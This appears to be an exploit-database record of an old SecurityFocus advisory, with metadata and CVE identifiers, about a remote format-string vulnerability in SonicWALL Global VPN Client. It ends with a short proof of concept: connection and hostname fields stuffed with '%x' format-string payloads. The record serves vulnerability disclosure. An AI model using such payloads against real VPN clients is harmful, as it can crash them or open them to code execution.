SonicWALL Global VPN Client 4.0.782 - Remote Format String
Author: SEC Consult
type: dos
platform: windows
port:
date_added: 2007-12-04
date_updated: 2014-01-10
verified: 1
codes: CVE-2007-6273;OSVDB-42502
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/26689/info
SonicWALL Global VPN Client is prone to a remote format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
Successfully exploiting this issue allows remote attackers to execute arbitrary machine code in the context of the application. Failed attempts may cause denial-of-service conditions.
Versions prior to SonicWALL Global VPN Client 4.0.0.830 are affected.
The following proof of concept was supplied:
<Connection name=> AAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%
x.%x
<HostName> BBBBBBBBBB%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%
x.%x.%x.%x.%x.%x.%x